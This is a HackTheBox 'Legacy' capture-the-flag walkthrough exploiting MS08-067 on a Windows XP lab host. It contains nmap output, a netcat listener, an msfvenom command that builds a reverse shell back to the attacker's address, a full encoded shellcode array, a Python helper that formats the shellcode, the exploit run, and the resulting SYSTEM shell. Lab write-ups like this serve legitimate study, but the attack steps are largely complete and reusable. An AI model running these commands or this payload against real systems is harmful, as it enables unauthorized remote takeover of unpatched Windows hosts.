HackTheBox Legacy walkthrough

Starting with nmap

# nmap -sC -sV 10.10.10.4 -oA htb/legacy/legacy
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-15 21:31 EDT
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h27m13s, deviation: 2h07m16s, median: 4d22h57m13s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:51:c6 (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2019-07-21T06:29:07+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 272.05 seconds

SMB (port 445) is open and the OS is Windows XP, hence the box name, Legacy. Two details in the script output are worth noting: SMB message signing is disabled, and the smb2-time script could not negotiate SMB2, so this is an SMB1-only host.

Searching on the internet: unpatched Windows XP is affected by MS08-067 (CVE-2008-4250), a stack buffer overflow in the Server service's path canonicalisation code (NetprPathCanonicalize in netapi32.dll) that an unauthenticated attacker can trigger over SMB, giving remote code execution as SYSTEM. Nmap's smb-vuln-ms08-067 NSE script can confirm the bug before exploiting it; that matters because an attempt with the wrong target profile can crash the Server service instead of returning a shell.

A Python exploit is available for this; we can download it from here. The script takes the target IP, a numeric target-OS index and the SMB port, and it ships with shellcode that has to be replaced.

So first of all we need to change the shellcode in the script. For this we generate our own shellcode with msfvenom.

We will listen on port 62000 for the shell.

# nc -lvnp 62000

Then generate the payload. windows/shell_reverse_tcp is the stageless variant, which is what a plain nc listener needs (it cannot serve a second stage). EXITFUNC=thread makes the payload end only its own thread on exit, so the Server service stays up; -b excludes the bad characters (NUL, CR/LF, and the path characters the vulnerable canonicalisation routine interprets) and msfvenom picks an encoder that avoids them; -f c prints the result as a C string.

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.44 LPORT=62000 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
-- snip --
unsigned char buf[] = 
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x99\xdb\xf4\xbb\x83\xee\xfc\xe2\xf4\x65\x33\x76\xbb\x99\xdb"
"\x94\x32\x7c\xea\x34\xdf\x12\x8b\xc4\x30\xcb\xd7\x7f\xe9\x8d"
"\x50\x86\x93\x96\x6c\xbe\x9d\xa8\x24\x58\x87\xf8\xa7\xf6\x97"
"\xb9\x1a\x3b\xb6\x98\x1c\x16\x49\xcb\x8c\x7f\xe9\x89\x50\xbe"
"\x87\x12\x97\xe5\xc3\x7a\x93\xf5\x6a\xc8\x50\xad\x9b\x98\x08"
"\x7f\xf2\x81\x38\xce\xf2\x12\xef\x7f\xba\x4f\xea\x0b\x17\x58"
"\x14\xf9\xba\x5e\xe3\x14\xce\x6f\xd8\x89\x43\xa2\xa6\xd0\xce"
"\x7d\x83\x7f\xe3\xbd\xda\x27\xdd\x12\xd7\xbf\x30\xc1\xc7\xf5"
"\x68\x12\xdf\x7f\xba\x49\x52\xb0\x9f\xbd\x80\xaf\xda\xc0\x81"
"\xa5\x44\x79\x84\xab\xe1\x12\xc9\x1f\x36\xc4\xb3\xc7\x89\x99"
"\xdb\x9c\xcc\xea\xe9\xab\xef\xf1\x97\x83\x9d\x9e\x24\x21\x03"
"\x09\xda\xf4\xbb\xb0\x1f\xa0\xeb\xf1\xf2\x74\xd0\x99\x24\x21"
"\xeb\xc9\x8b\xa4\xfb\xc9\x9b\xa4\xd3\x73\xd4\x2b\x5b\x66\x0e"
"\x63\xd1\x9c\xb3\xfe\xb1\x97\xf7\x9c\xb9\x99\x29\xc4\x32\x7f"
"\xb1\xe4\xed\xce\xb3\x6d\x1e\xed\xba\x0b\x6e\x1c\x1b\x80\xb7"
"\x66\x95\xfc\xce\x75\xb3\x04\x0e\x3b\x8d\x0b\x6e\xf1\xb8\x99"
"\xdf\x99\x52\x17\xec\xce\x8c\xc5\x4d\xf3\xc9\xad\xed\x7b\x26"
"\x92\x7c\xdd\xff\xc8\xba\x98\x56\xb0\x9f\x89\x1d\xf4\xff\xcd"
"\x8b\xa2\xed\xcf\x9d\xa2\xf5\xcf\x8d\xa7\xed\xf1\xa2\x38\x84"
"\x1f\x24\x21\x32\x79\x95\xa2\xfd\x66\xeb\x9c\xb3\x1e\xc6\x94"
"\x44\x4c\x60\x14\xa6\xb3\xd1\x9c\x1d\x0c\x66\x69\x44\x4c\xe7"
"\xf2\xc7\x93\x5b\x0f\x5b\xec\xde\x4f\xfc\x8a\xa9\x9b\xd1\x99"
"\x88\x0b\x6e";

Replace the shellcode in the script with the output above. Paste only the quoted lines: drop the `unsigned char buf[] =` declaration and the trailing `;`, since the script expects a Python string literal, not a C array.
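Pasting the C string by hand is where mistakes creep in (a stray `;`, a line missed, or an encoder that let a bad byte through). The helper below is an added example, not code from the page or from the exploit script: it parses msfvenom's `-f c` output, checks every byte against the bad-character list used above, and re-renders the payload as the concatenated Python string literal the script wants. The sample input is a constructed, shortened stand-in for the msfvenom output, not a working payload, and the `shellcode` variable name and 15-bytes-per-line layout are assumptions about the script's format.

```python
import re

# Bad characters from the msfvenom command above: bytes the exploit cannot carry.
BAD_CHARS = b"\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"

# Constructed, shortened stand-in for msfvenom `-f c` output (not a working payload).
SAMPLE_C_OUTPUT = r'''
unsigned char buf[] = 
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x99\xdb\xf4\xbb\x83\xee\xfc\xe2\xf4\x65\x33\x76\xbb\x99\xdb"
"\x88\x0b\x6e";
'''


def parse_c_shellcode(text):
    """Pull every \\xNN escape out of msfvenom -f c output and return raw bytes.
    The `unsigned char buf[] =` header, the quotes and the trailing ';' are ignored."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def find_bad_chars(buf, bad=BAD_CHARS):
    """Return (offset, byte) for every byte of buf that is in the bad-character set."""
    return [(i, b) for i, b in enumerate(buf) if b in bad]


def to_python_literal(buf, name="shellcode", width=15):
    """Render buf as the concatenated string literal the exploit script expects
    (assumed variable name and line width)."""
    lines = [name + " = ("]
    for i in range(0, len(buf), width):
        chunk = buf[i:i + width]
        lines.append('"' + "".join("\\x%02x" % b for b in chunk) + '"')
    lines.append(")")
    return "\n".join(lines)


def prepare(text, bad=BAD_CHARS):
    """Parse, verify and re-render; raise if the encoder let a bad byte through."""
    buf = parse_c_shellcode(text)
    hits = find_bad_chars(buf, bad)
    if hits:
        raise ValueError("bad chars at " + ", ".join("%d:0x%02x" % h for h in hits))
    return to_python_literal(buf)


if __name__ == "__main__":
    import sys
    # Usage: msfvenom ... -f c | python3 prepare_shellcode.py
    print(prepare(sys.stdin.read()))
```

Pipe the msfvenom command straight into it and paste the printed block over the script's shellcode definition; a ValueError means the encoder did not honour the bad-character list and the payload needs regenerating.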

Then run the Python script against the target with target index 6 (Windows XP SP3 English (NX), which the script echoes back) and port 445:

# python ms08-067.py  10.10.10.4 6 445
-- snip --
Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish

We get the shell on the listener. The Server service runs as NT AUTHORITY\SYSTEM, so this shell is already SYSTEM and no privilege escalation is needed:

# nc -lvnp 62000
listening on [any] 62000 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.4] 1031
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
